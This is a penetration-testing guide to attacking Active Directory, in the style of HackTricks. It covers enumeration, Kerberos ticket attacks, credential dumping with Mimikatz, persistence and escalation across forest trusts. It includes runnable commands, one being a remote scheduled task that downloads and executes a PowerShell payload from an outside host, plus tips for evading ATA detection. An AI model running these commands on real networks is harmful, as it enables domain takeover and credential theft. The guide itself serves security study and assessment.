If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** 💬 **PEASS & HackTricks telegram group here, or follow me on Twitter** 🐦@carlospolopm.
If you want to share some tricks with the community you can also submit pull requests to **[https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **that will be reflected in this book.
Don’t forget to give ⭐ on the github** to motivate me to continue developing this book.
Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server. As a network grows, Active Directory provides a way to organize a large number of users into logical groups and subgroups, while providing access control at each level.
The Active Directory structure includes three main tiers: 1) domains, 2) trees, and 3) forests. Several objects (users or devices) that all use the same database may be grouped in to a single domain. Multiple domains can be combined into a single group called a tree. Multiple trees may be grouped into a collection called a forest. Each one of these levels can be assigned specific access rights and communication privileges.
Main concepts of an Active Directory:
Active Directory provides several different services, which fall under the umbrella of “Active Directory Domain Services,” or AD DS. These services include:
AD DS is included with Windows Server (including Windows Server 10) and is designed to manage client systems. While systems running the regular version of Windows do not have the administrative features of AD DS, they do support Active Directory. This means any Windows computer can connect to a Windows workgroup, provided the user has the correct login credentials.
From: https://techterms.com/definition/active_directory****
To learn how to attack an AD you need to understand really good the Kerberos authentication process.
Read this page if you still don’t know how it works.****
You can take a lot to https://wadcoms.github.io/ to have a quick view of which commands you can run to enumerate/exploit an AD.
If you just have access to an AD environment but you don’t have any credentials/sessions you could:
enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
When an invalid username is requested the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, allowing us to determine that the username was invalid. Valid usernames will illicit either the TGT in a AS-REP response or the error KRB5KDC_ERR_PREAUTH_REQUIRED, indicating that the user is required to perform pre-authentication.
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
msf> use auxiliary/gather/kerberos_enumusers
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
enum4linux -U 10.10.10.161 | grep 'user:' | sed 's/user:\[//g' | sed 's/\]//g' | awk '{print $1}'
You could also use the impacket script of ASREPRoast to enumerate valid usernames.
Ok, so you know you have already a valid username but no passwords…Then try:
For this phase you need to have compromised the credentials or a session of a valid domain account.
If you have some valid credentials or a shell as a domain user, you should remember that the options given before are still options to compromise other users.
Regarding ASREPRoast you can now find every possible vulnerable user, and regarding **[Password Spraying](password-spraying.md) you can get a list of all the usernames and try the password of the compromised account (if you know it). It’s very easy to obtain all the domain usernames from Windows (net user /domain
,Get-DomainUser
or wmic useraccount get name,sid
). In linux** you can use: GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username
Having compromised an account is a big step to start compromising the whole domain, because you are going to be able to start the Active Directory Enumeration:
Even if this Enumeration section looks small this is the most important part of all. Access the links (mainly the one of cmd, powershell, powerview and BloodHound), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.
The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets are encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline.
You can know that a user account is being used as a service because the property “ServicePrincipalName” is not null.
Find more information about this attack in the Kerberoast page.
If you have compromised credentials or a session as a regular domain user and you have access with this user to any machine in the domain you should try to find your way to escalate privileges locally. This is because only with admin privileges you will be able to dump hashes of other users in memory (LSASS) and locally (SAM).
There is a complete page in this book about local privilege escalation in Windows and a **[checklist](../checklist-windows-privilege-escalation.md). Also, don’t forget to try **WinPEAS.
Once you have obtained some credentials you could check if you have access to any machine using the win-rm service.
More information about how to use and abuse win-rm here.****
For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.
Hopefully you have managed to compromise some local admin account using ASREPROast, Password Spraying, Kerberoast, Responder, EvilSSDP, Enumerating… or escalating privileges locally.
Then, its time to dump all the hashes in memory and locally.
Read this page about different ways to obtain the hashes.****
Once you have the hash of a user, you can use it to impersonate it.
You need to use some tool that will perform the NTLM authentication using that hash, or you could create a new sessionlogon and inject that hash inside the LSASS, so when any NTLM authentication is performed, that hash will be used. The last option is what mimikatz does.
****[**More information about this attack and about how does NTLM works here._*](../ntlm/#pass-the-hash)_***
This attack aims to use the user NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially useful in networks where NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.
More information about Over Pass the Hash/Pass the Key here.****
This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.
****[**More information about Pass the Ticket here._*](pass-the-ticket.md)_***
If a user has privileges to access MSSQL instances, he could be able to use it to execute commands in the MSSQL host (if running as SA).
Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to use the trust relationship to execute queries also in the other instance. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands.
The links between databases work even across forest trusts.
More information about this technique here.****
If you find any Computer object with the attribute ADS_UF_TRUSTED_FOR_DELEGATION and you have domain privileges in the computer, you will be able to dump TGTs from memory of every users that logins onto the computer.
So, if a Domain Admin logins onto the computer, you will be able to dump his TGT and impersonate him using Pass the Ticket.
Thanks to constrained delegation you could even automatically compromise a Print Server (hopefully it will be a DC).
More information about this technique here.****
If a user or computer is allowed for “Constrained Delegation” it will be able to impersonate any user to access some services in a computer.
Then, if you compromise the hash of this user/computer you will be able to impersonate any user (even domain admins) to access some services.
More information about this attacks and some constrains here.****
The compromised user could have some interesting privileges over some domain objects that could let you move laterally/escalate privileges.
More information about interesting privileges here.****
If you can find any Spool service listening inside the domain, you may be able to abuse is to obtain new credentials and escalate privileges.
More information about how to find a abuse Spooler services here.****
Once you get Domain Admin privileges, you can dump all the domain database.
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
More information about DCSync attack can be found here.
More information about how to steal the NTDS.dit (Domain database) can be found here.
Some of the techniques discussed before can be used for persistence. For example you could make a user vulnerable to ASREPRoast or to Kerberoast.
A valid TGT as any user can be created using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of TGS is being able to access any service (or machine) in the domain ad the impersonated user.
****More information about Golden Ticket here.****
The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user (like privileged access to a computer).
More information about Silver Ticket here.****
The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all “protected groups” in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
By default, the ACL of this group is copied inside all the “protected groups”. This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group AdminSDHolder for example, giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group (in an hour).
And if someone tries to delete this user from the Domain Admins (for example) in an hour or less, the user will be back in the group.
****[**More information about AdminSDHolder Group here._*](privileged-accounts-and-token-privileges.md#adminsdholder-group)_***
There is a local administrator account inside each DC. Having admin privileges in this machine, you can use mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user.
****[**More information about DSRM Credentials here.**](dsrm-credentials.md)
You could give some special permissions to a user over some specific domain objects that will let the user escalate privileges in the future.
More information about interesting privileges here.****
The security descriptors are used to store the permissions an object have over an object. If you can just make a little change in the security descriptor of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.
****[**More information about Security Descriptors here._*](security-descriptors.md)_***
Modify LSASS in memory to create a master password that will work for any account in the domain.
More information about Skeleton Key here.****
Learn what is a SSP (Security Support Provider) here.
You can create you own SSP to capture in clear text the credentials used to access the machine.
****[**More information about Custom SSP here.**](custom-ssp.md)
It registers a new Domain Controller in the AD and uses it to push attributes (SIDHistory, SPNs…) on specified objects without leaving any logs regarding the modifications. You need DA privileges and be inside the root domain.
Note that if you use wrong data, pretty ugly logs will appear.
****[**More information about DCShadow here.**](dcshadow.md)
Microsoft considers that the domain isn’t a Security Boundary, the Forest is the security Boundary. This means that if you compromise a domain inside a Forest you are going to be able to compromise the entire Forest.
At a high level, a domain trust establishes the ability for users in one domain to authenticate to resources or act as a security principal in another domain.
Essentially, all a trust does is linking up the authentication systems of two domains and allowing authentication traffic to flow between them through a system of referrals.
When 2 domains trust each other they exchange keys, these keys are going to be saved in the DCs of each domains (1 key per trust direction) and the keys will be the base of the trust.
When a user tries to access a service on the trusting domain it will request an inter-realm TGT to the DC of its domain. The DC wills serve the client this TGT which would be encrypted/signed with the inter-realm key (the key both domains exchanged). Then, the client will access the DC of the other domain and will request a TGS for the service using the inter-realm TGT. The DC of the trusting domain will check the key used, if it’s ok, it will trust everything in that ticket and will serve the TGS to the client.
It’s important to notice that a trust can be 1 way or 2 ways. In the 2 ways options, both domains will trust each other, but in the 1 way trust relation one of the domains will be the trusted and the other the trusting domain. In the last case, you will only be able to access resources inside the trusting domain from the trusted one.
A trust relationship can also be transitive (A trust B, B trust C, then A trust C) or non-transitive.
Different trusting relationships:
There are three main ways that security principals (users/groups/computer) from one domain can have access into resources in another foreign/trusting domain:
Also, notice that there are 2 trusted keys, one for Child –> Parent and another one for P_arent –> Child_.
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:7ef5be456dc8d7450fb8f5f7348746c5 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
/domain:<Current domain>
/sid:<SID of current domain>
/sids:<SID of the Enterprise Admins group of the parent domain>
/rc4:<Trusted key>
/user:Administrator
/service:<target service>
/target:<Other domain>
/ticket:C:\path\save\ticket.kirbi
For finding the SID of the “Enterprise Admins” group you can find the SID of the root domain and set it in S-1-5-21_root domain_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the “Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
In this case you can sign with the trusted key a TGT impersonating the Administrator user of the current domain. In this case you won’t always get Domain Admins privileges in the external domain, but only the privileges the Administrator user of your current domain was given in the external domain.
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
SID Filtering:
****More information about domain trusts in ired.team.****
****Learn more about how to protect credentials here.
Please, find some migrations against each technique in the description of the technique.
Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)
Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
For user objects:
General:
ATA only complains when you try to enumerate sessions in the DC, so if you don’t look for sessions in the DC but in the rest of the hosts, you probably won’t get detected.
Always create the tickets using the aes keys also because what ATA identifies as malicious is the degradation to NTLM.
If you don’t execute this from a Domain Controller, ATA is going to catch you, sorry.
Buy me a coffee here****